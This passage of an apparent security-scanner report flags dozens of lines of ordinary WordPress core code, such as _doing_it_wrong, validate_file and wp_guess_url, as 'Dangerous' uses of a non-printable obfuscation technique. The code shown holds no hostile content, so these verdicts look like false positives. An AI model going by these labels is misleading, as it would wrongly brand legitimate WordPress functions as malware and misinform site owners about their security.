<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_deprecated_hook</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$version</span><span style="color: #007700">, </span><span style="color: #0000BB">$replacement </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_doing_it_wrong</span><span style="color: #007700">( </span><span style="color: #0000BB">$function_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$version </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6002</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is being used incorrectly</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6016</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$message </span><span style="color: #007700">and </span><span style="color: #0000BB">$version parameters</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6023</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$version </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6037</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">: </span><span style="color: #0000BB">Explanatory message</span><span style="color: #007700">, </span><span style="color: #0000BB">3</span><span style="color: #007700">: </span><span style="color: #0000BB">WordPress version number</span><span style="color: #007700">. */</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6038</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function %</span><span style="color: #0000BB">1$s was called </span><span style="color: #007700"><</span><span style="color: #0000BB">strong</span><span style="color: #007700">></span><span style="color: #0000BB">incorrectly</span><span style="color: #007700"></</span><span style="color: #0000BB">strong</span><span style="color: #007700">>. %</span><span style="color: #0000BB">2$s </span><span style="color: #007700">%</span><span style="color: #0000BB">3$s</span><span style="color: #DD0000">' ),</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6054</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function %</span><span style="color: #0000BB">1$s was called </span><span style="color: #007700"><</span><span style="color: #0000BB">strong</span><span style="color: #007700">></span><span style="color: #0000BB">incorrectly</span><span style="color: #007700"></</span><span style="color: #0000BB">strong</span><span style="color: #007700">>. %</span><span style="color: #0000BB">2$s </span><span style="color: #007700">%</span><span style="color: #0000BB">3$s</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_name The </span><span style="color: #007700">function </span><span style="color: #0000BB">that triggered the error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6077</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid being stripped </span><span style="color: #007700">{@</span><span style="color: #0000BB">see wp_kses</span><span style="color: #007700">()}.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6081</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_trigger_error</span><span style="color: #007700">( </span><span style="color: #0000BB">$function_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$error_level </span><span style="color: #007700">= </span><span style="color: #0000BB">E_USER_NOTICE </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6089</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">triggers a user</span><span style="color: #007700">-</span><span style="color: #0000BB">level error</span><span style="color: #007700">/</span><span style="color: #0000BB">warning</span><span style="color: #007700">/</span><span style="color: #0000BB">notice</span><span style="color: #007700">/</span><span style="color: #0000BB">deprecation message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6099</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$error_level </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_name </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$message </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the server is running lighttpd </span><span style="color: #007700">< </span><span style="color: #0000BB">1.5.0</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_lighttpd_before_150</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6135</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return ( </span><span style="color: #DD0000">'lighttpd' </span><span style="color: #007700">=== </span><span style="color: #0000BB">$server_parts</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">] && -</span><span style="color: #0000BB">1 </span><span style="color: #007700">=== </span><span style="color: #0000BB">version_compare</span><span style="color: #007700">( </span><span style="color: #0000BB">$server_parts</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">], </span><span style="color: #DD0000">'1.5.0' </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6146</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">value </span><span style="color: #007700">if </span><span style="color: #0000BB">the module is not found</span><span style="color: #007700">. Default </span><span style="color: #0000BB">false</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6147</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the specified module is loaded</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6149</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">apache_mod_loaded</span><span style="color: #007700">( </span><span style="color: #0000BB">$mod</span><span style="color: #007700">, </span><span style="color: #0000BB">$default_value </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6158</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'apache_get_modules' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6167</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'phpinfo' </span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6168</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">' ), '</span><span style="color: #0000BB">phpinfo</span><span style="color: #DD0000">' )</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6189</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether IIS7 supports permalinks</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 618</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">compact</span><span style="color: #007700">( </span><span style="color: #DD0000">'start'</span><span style="color: #007700">, </span><span style="color: #DD0000">'end' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6191</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">iis7_supports_permalinks</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6215</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'iis7_supports_permalinks'</span><span style="color: #007700">, </span><span style="color: #0000BB">$supports_permalinks </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6221</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">value of </span><span style="color: #007700">`</span><span style="color: #DD0000">1</span><span style="color: #007700">` </span><span style="color: #0000BB">means the file path contains directory traversal</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6223</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">value of </span><span style="color: #007700">`</span><span style="color: #DD0000">2</span><span style="color: #007700">` </span><span style="color: #0000BB">means the file path contains a Windows drive path</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6225</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">value of </span><span style="color: #007700">`</span><span style="color: #DD0000">3</span><span style="color: #007700">` </span><span style="color: #0000BB">means the file is not in the allowed files </span><span style="color: #007700">list.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6231</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int 0 means nothing is wrong</span><span style="color: #007700">, </span><span style="color: #0000BB">greater than 0 means something was wrong</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validate_file</span><span style="color: #007700">( </span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$allowed_files </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6260</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">3</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">2</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6277</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool True </span><span style="color: #007700">if </span><span style="color: #0000BB">forced</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">not forced</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">force_ssl_admin</span><span style="color: #007700">( </span><span style="color: #0000BB">$force </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 627</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">mixed A scalar data</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$old_forced</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6288</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$forced</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">URLs not in the wp</span><span style="color: #007700">-</span><span style="color: #0000BB">admin</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6299</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The guessed URL</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 629</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">maybe_serialize</span><span style="color: #007700">( </span><span style="color: #0000BB">$data </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">the time in the format </span><span style="color: #007700">for </span><span style="color: #0000BB">MySQL DATETIME field</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6301</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_guess_url</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 631</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">serialize</span><span style="color: #007700">( </span><span style="color: #0000BB">$data </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6337</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">( </span><span style="color: #0000BB">$url</span><span style="color: #007700">, </span><span style="color: #DD0000">'/' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6348</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">again </span><span style="color: #007700">if </span><span style="color: #0000BB">you wish to re</span><span style="color: #007700">-</span><span style="color: #0000BB">enable cache adds earlier</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6354</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool The current suspend setting</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6356</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_suspend_cache_addition</span><span style="color: #007700">( </span><span style="color: #0000BB">$suspend </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6363</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$_suspend</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6380</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_suspend_cache_invalidation</span><span style="color: #007700">( </span><span style="color: #0000BB">$suspend </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6385</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$current_suspend</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6397</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool True </span><span style="color: #007700">if </span><span style="color: #0000BB">$site_id is the main site of the network</span><span style="color: #007700">, or if </span><span style="color: #0000BB">not</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
